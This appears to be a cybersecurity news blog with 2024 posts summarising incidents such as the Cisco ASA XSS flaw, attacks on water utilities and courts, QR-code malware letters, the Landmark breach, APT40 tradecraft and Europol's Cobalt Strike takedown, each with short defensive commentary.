Tuesday, December 10, 2024

A Decade-Old Cisco ASA WebVPN Vulnerability

If your systems are still susceptible to a decade-old vulnerability, it's clear that your vulnerability or patch management systems are not functioning effectively, or perhaps both.

This is not a hypothetical situation, but a real-world occurrence. Actually it's no surprise, as many organizations still lack a proper vulnerability management system. The worst part is, some of them are unaware of the risks involved with not having a vulnerability management system.


https://bit.ly/3Vxf5vr


"Cisco on Monday (2 Dec 2024) updated an advisory to warn customers of active exploitation of a decade-old security flaw impacting its Adaptive Security Appliance (ASA).


The vulnerability, tracked as CVE-2014-2120 (CVSS score: 4.3), concerns a case of insufficient input validation in ASA's WebVPN login page that could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a targeted user of the appliance."


"The development comes shortly after cybersecurity firm CloudSEK revealed that the threat actors behind AndroxGh0st are leveraging an extensive list of security vulnerabilities in various internet-facing applications, including CVE-2014-2120, to propagate the malware."

Sunday, December 1, 2024

Cyber Attacks on UK Drinking Water Supplies

Cybersecurity is paramount for all sectors, especially those critical to our infrastructure. The consequences can be catastrophic if critical infrastructures are compromised by cyberattacks. Imagine the chaos that would ensue if you were without water for even three days.


A record number of cyber incidents impacted Britain’s critical drinking water supplies in 2024 without being publicly disclosed.


https://bit.ly/4fRV0s2


"Across all regulated critical national infrastructure sectors, more NIS incidents have been reported this year than ever before, with the transport and drinking water sectors the most impacted. In 2024, there were at least six incidents affecting drinking water infrastructure, according to data collected by Recorded Future News using the Freedom of Information (FOI) Act. In previous years there were no more than two."

Monday, November 18, 2024

Malware Via Snail Mail

Receiving malware through physical mail, delivered to your postbox on a piece of paper, might seem unusual. However, it has happened in Switzerland, and there's no reason to think it couldn't happen in your country as well.

Cybercriminals have sent physical letters containing QR codes that link to malicious software. These letters falsely claim to offer a new weather app from MeteoSwiss (the official meteorological service of Switzerland) but actually contain a QR code leading to a malicious app created by cybercriminals. Such attacks using QR codes are known as 'QR-phishing' or 'quishing'."


https://bit.ly/4fzRQJs


"...These letters are fake and have been sent by fraudsters who are trying to load malware onto mobile phones.


The letter asks the recipients to install a new severe weather app. However, there is no such federal app with the name mentioned. Rather, the QR code shown in the letter leads to the download of malware called ‘Coper’ (also known as ‘Octo2’). When the supposed ‘Severe Weather Warning App’ is installed, the malware attempts to steal sensitive data such as access data from over 383 smartphone apps, including e-banking apps.


The malware only affects smartphones that run on the Android operating system..." 

Wednesday, November 6, 2024

San Joaquin County Superior Court Cyber Attack

 

Another cyber incident about JoIP (Justice over IP).

But first recall this:

https://bit.ly/40FHQK5


Cybercriminals can target any system connected to the internet, regardless of its importance or sensitivity. From personal devices to critical infrastructure, no system is immune, including justice systems which rely on an IT infrastructure.


Last week, a cyberattack disrupted operations at a California (USA) court, causing technological outages


A pressing concern can arise among the public at this point: If cybercriminals can breach court systems, could they also manipulate critical legal documents?


Well... The answer is not easy to tell. While the exact extent of potential damage is difficult to assess, it is clear that such attacks pose a serious threat to the integrity of the justice system.


https://bit.ly/3CavMGg


"The attack knocked out all of the court’s phone and fax services, websites containing juror reporting instructions, the e-filing platform, credit card payment processing and more. Some jurors scheduled for this week were excused."


"The attack comes just months after the Los Angeles County Superior Court system was hit with a ransomware attack that caused identical issues for weeks..."


"Government bodies across California continue to face an unprecedented wave of cyberattacks affecting city, county and state-level services. On Thursday (31.10.2024), the Housing Authority of the City of Los Angeles confirmed it is facing its second major cyberattack in the last two years."

Tuesday, October 29, 2024

Landmark Data Breach


You can take necessary cybersecurity countermeasures for your system but will that be enough?

Of course not. Quite many organizations overlook the security of their third-party service providers, which can lead to significant financial and reputational damage.


"Landmark, a Texas-based third-party insurance administrator, has disclosed a data breach that affects more than 800,000 individuals. The incident was detected in May; the compromised data include names, Social Security numbers, tax ID numbers, drivers’ license and state-issued identification card numbers, passport numbers, bank account and routing numbers, medical information, health insurance policy information, dates of birth, and/or life and annuity policy information..." (OMG! What else?)


See the link below for the summary of the breach:

https://bit.ly/3NQ28bP


https://bit.ly/3NJaEtj


"The Texas-based company works as a third-party administrator for insurance carriers like Liberty Bankers Insurance Group (LBIG), which includes American Monumental Life Insurance Company, Pellerin Life Insurance Company, American Benefit Life Insurance Company, Liberty Bankers Life Insurance Company, Continental Mutual Insurance Company, and Capitol Life Insurance Company."


"The breach notification letters note that the first incident occurred on May 13, when an IT team discovered “suspicious activity” that required them to disconnect the affected systems and hire a third-party cybersecurity firm. 

An investigation revealed that “there was unauthorized access to Landmark’s network and data was encrypted and exfiltrated from its system.” The hackers were in Landmark’s systems from May 13 to June 17." (The hackers were in the system for more than one month.)


"Landmark told regulators in Maine that 806,519 people were affected in total but they also filed documents in California and Texas, warning that about 68,000 Texans were impacted.


Insurance companies and their partners or subsidiaries are frequent targets for cyberattacks eager to steal volumes of sensitive health-related data. Last week, insurance firm Globe Life told the U.S. Securities and Exchange Commission that is being extorted by hackers after data on more than 5,000 people was stolen from a subsidiary."

Wednesday, October 9, 2024

American Water Works Cyber Attack

Cyber security on critical infrastructure are really critical but you need to understand it before you get hit by a cyber attack. Understand this before you are left without electricity or water. Take the cyber threats seriously and take countermeasures against cyber threats before it's too late.


American Water Works, a major water utility, was recently targeted by a cyber attack, they announced via a statement. While the company reported that its water and wastewater facilities were not directly affected, the incident underscores the vulnerability of critical infrastructure to cyber threats. A successful cyber attack on a critical infrastructure provider could have severe consequences, including disruptions in essential services and potential public health risks. Investing in robust cybersecurity measures is essential to protect critical infrastructure and ensure the continued delivery of essential services.


https://bit.ly/4eNgl50


"The company’s MyWater account system is currently down, according to a notice on the company website, and all appointments set up by customers will be rescheduled. Additionally, all billing has been paused until further notice as they try to bring systems back online — there will be no late charges or service shut offs while systems are down."


"American Water Works provides drinking water, wastewater and other related services to an estimated 14 million people in 14 states as well as 18 military installations. From its regulated businesses, the company reported a net income of $971 million for 2023."


"American Water Works did not respond to requests for comment about whether they are dealing with a ransomware attack or if a ransom has been issued."


The EPA (U.S. Environmental Protection Agency) said in May (2024) that in recent inspections, over 70% of water systems examined do not fully comply with the Safe Drinking Water Act and some 'have critical cybersecurity vulnerabilities, such as default passwords that have not been updated and single logins that can easily be compromised.'”

Tuesday, July 16, 2024

China's APT40 Gang is Ready to Attack Vulnerabilities Within Hours or Days

An advisory led by Australia, involving law enforcement agencies from the US, Canada, New Zealand, Japan, South Korea, the UK, and Germany, has revealed the tradecraft of the China-aligned threat actor APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. This state-sponsored cyber group, backed by the PRC Ministry of State Security, prioritizes developing and deploying exploits for new vulnerabilities rapidly. The advisory details how APT40 conducts regular reconnaissance to identify unpatched or obsolete devices, allowing swift deployment of exploits. 


APT40's targets include vulnerabilities like Log4J and Microsoft Exchange, often exploiting end-of-life small-office/home-office (SOHO) devices to mask their attacks as legitimate traffic. The group uses web shells and searches for valid user credentials to maintain persistent access, ultimately installing malware to exfiltrate information.


The advisory provides mitigation tactics such as logging, patch management, network segmentation, multifactor authentication, disabling unused services, web application firewalls, least privilege access, and replacing outdated equipment. It also includes links to ten malware samples used by APT40 and two case studies, though these may now be outdated. This information stems from Australia's Cyber Security Centre's 2022 investigation into an APT40 attack on a local organization.


https://bit.ly/4bKhM24


"The advisory is the result, and suggests that APT40 "possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability." The gang also watches networks of interest to look for unpatched targets."


"...Some of the vulns APT40 targets are old news – Log4J (CVE 2021 44228), Atlassian Confluence (CVE-2021-31207, CVE-2021- 26084). and Microsoft Exchange (CVE-2021-31207, CVE 2021-34523, CVE-2021-34473) are high on the hit list."


"The advisory outlines mitigation tactics that are said to offer decent defences against APT40. They're not rocket science: logging, patch management, and network segmentation are all listed.

So are multifactor authentication, disabling unused network services, use of web application firewalls, least privilege access, and replacement of end-of-life equipment."

Wednesday, July 10, 2024

Cobalt Strike Crackdown of Europol


International joint operations are strongly needed against the bad guys.

Europol announced that a week-long operation at the end of June dropped nearly 600 IP addresses that supported illegal copies of Cobalt Strike.


Cobalt Strike is a commercial penetration testing tool for red team operations, featuring a command and control framework, the Beacon payload for post-exploitation, and supports attack vectors like spear-phishing. It emulates advanced threats to test and enhance cybersecurity defenses.


https://bit.ly/3XWM66f


"Europol said the disruptive action, dubbed Operation Morpheus, is the culmination of work that began three years ago. It was carried out with partners in the private sector between June 24 and 28."


"A total of 690 IP addresses were flagged to online service providers in 27 countries. By the end of the week, 593 of these addresses had been taken down."


"This investigation was led by the UK National Crime Agency and involved law enforcement authorities from Australia, Canada, Germany, the Netherlands, Poland, and the United States. Europol coordinated the international activity and liaised with the private partners."


"Cobalt Strike has long been the tool of choice for cybercriminals, including as a precursor to ransomware. It is also deployed by nation-state actors, such as Russian and Chinese [groups], to facilitate intrusions in cyber espionage campaigns."


"According to its telemetry, China hosts 43.85 percent of Cobalt Strike resources. To put that in context, the next biggest distributor is the US with a 19.08 percent share."


"Since Fortra bought Cobalt Strike in 2020, it has made strides in ensuring criminals don't get access to legitimate versions of its tools. For example, it soon started vetting all applicants vigorously before giving licenses out, but cracked versions in hard-to-reach places like China may prove difficult to eradicate for good."